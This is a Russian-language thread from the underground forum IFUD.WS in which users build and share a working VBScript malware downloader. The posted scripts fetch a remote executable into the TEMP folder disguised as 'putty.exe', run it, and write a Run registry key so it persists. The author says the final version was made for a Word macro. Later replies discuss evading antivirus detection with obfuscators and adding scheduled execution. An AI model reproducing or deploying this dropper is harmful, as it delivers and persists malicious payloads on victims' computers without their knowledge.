1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Даунлоадер VBS Downloader, просьба к знатокам : помогите пожалуйста!

Тема в разделе "РАТ| Бэкдоры | РМС | Даунлоадеры", создана пользователем mir12, 23 мар 2018.

  1. TopicStarter Overlay
    mir12

    mir12

    Регистрация:
    16 фев 2018
    Сообщения:
    11
    Симпатии:
    0
    Я совершенно не знаком с VB - поэтому и обращаюсь сюда.
    нужно написать загрузчик, который будет загружать файл в дерикторию %ТЕМП%

    Я накидал примерно вот такой вот скрипт :

    dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
    dim bStrm: Set bStrm = createobject("Adodb.Stream")
    xHttp.Open "GET", "Войти или зарегистрироваться, чтобы увидеть ссылку.", False
    xHttp.Send

    with bStrm
    .type = 1 '//binary
    .open
    .write xHttp.responseBody
    .savetofile "C:\Users\SKYNET\AppData\Local\Temp\putty.exe", 2 '//overwrite
    end with

    Set WSHShell = WScript.CreateObject("WScript.Shell")
    WSHShell.Run "C:\Users\SKYNET\AppData\Local\Temp\putty.exe"

    Dim WSHShell
    Set WSHShell=Wscript.CreateObject("Wscript.Shell")
    WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Window","C:\Users\SKYNET\AppData\Local\Temp\putty.exe","REG_SZ"

    Проблема в том, что я не могу разобраться с тем, как мне указать путь к этой папке без полного адреса. Как обозначить эту папку, допустим, как в бат файлах?

    Немного покопавшись в интернете я смог модифицировать до такой вот стадии:

    dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
    dim bStrm: Set bStrm = createobject("Adodb.Stream")
    xHttp.Open "GET", "Войти или зарегистрироваться, чтобы увидеть ссылку.", False
    xHttp.Send
    Set environmentVars = WScript.CreateObject("WScript.Shell").Environment("Process")
    tempFolder = environmentVars("TEMP")
    Fileopen = tempFolder + "\putty.exe"

    with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile Fileopen, 2
    end with

    CreateObject("WScript.Shell").Run(""& Fileopen &""),1

    Dim WSHShell
    Set WSHShell=Wscript.CreateObject("Wscript.Shell")
    WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Window","понятия не имею как указать путь до файла","REG_SZ"

    То есть файл действительно летит из сети в папку ТЕМП, но как прописать его в реестре, я совершенно не имею понимания. Пожалуйста, помогите мне - если кто то знает чем дополнить скрипт, как прописать путь к файлу в папке темп, не указывая имя юзер-профиля.
     
    Метки:
  2. dencikkk

    dencikkk

    Регистрация:
    6 ноя 2015
    Сообщения:
    75
    Симпатии:
    2
    ну вот у тебя в переменной Fileopen лежит путь : tempFolder + "\putty.exe"

    Т.е

    WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Window", tempFolder + "\putty.exe","REG_SZ"

    Попробуй так, с VB не знаком , но если я все правильно понял то должно сработать
     
  3. TopicStarter Overlay
    mir12

    mir12

    Регистрация:
    16 фев 2018
    Сообщения:
    11
    Симпатии:
    0

    Да, ты оказался прав. А я дурак пытался сделать тоже самое в том числе, только выводил все в ковычки, в том числе темпфолдэр, а оно так все в реестр и прописывалось(

    В общем, спасибо большое тебе
     
  4. GSLLL2

    GSLLL2

    Регистрация:
    26 май 2018
    Сообщения:
    6
    Симпатии:
    0
    Конечный результат не выложишь? Я тоже в этом не силен.
     
    • Dislike Dislike x 1
  5. TopicStarter Overlay
    mir12

    mir12

    Регистрация:
    16 фев 2018
    Сообщения:
    11
    Симпатии:
    0
    dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
    dim bStrm: Set bStrm = createobject("Adodb.Stream")
    environment = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%temp%")
    path = environment & "\putty.exe"

    xHttp.Open "GET", "Войти или зарегистрироваться, чтобы увидеть ссылку.", False
    xHttp.Send

    with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile path, 2
    end with

    Set WSHShell = WScript.CreateObject("WScript.Shell")
    WSHShell.Run path

    Dim WSHShell
    Set WSHShell=Wscript.CreateObject("Wscript.Shell")
    WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Windows", path, "REG_SZ"

    ====================================================
    Я делал вообще это для маркоса MS word
    Но если надо просто вбс, то так вроде подойдет
    ====================================================
     
  6. GSLLL2

    GSLLL2

    Регистрация:
    26 май 2018
    Сообщения:
    6
    Симпатии:
    0
    Спасибо большое. А как у него с палевностью, не проверял?
     
  7. TopicStarter Overlay
    mir12

    mir12

    Регистрация:
    16 фев 2018
    Сообщения:
    11
    Симпатии:
    0
    ну он очевидно будет палиться, но благо для вбс существует куча обфускаторов
     
  8. minterc11

    minterc11

    Регистрация:
    16 июл 2018
    Сообщения:
    5
    Симпатии:
    0
    А как добавить запуск файла по расписанию? И если по ссылке нет файла, то ни чего не придпринимать?
     

Поделиться этой страницей

Загрузка...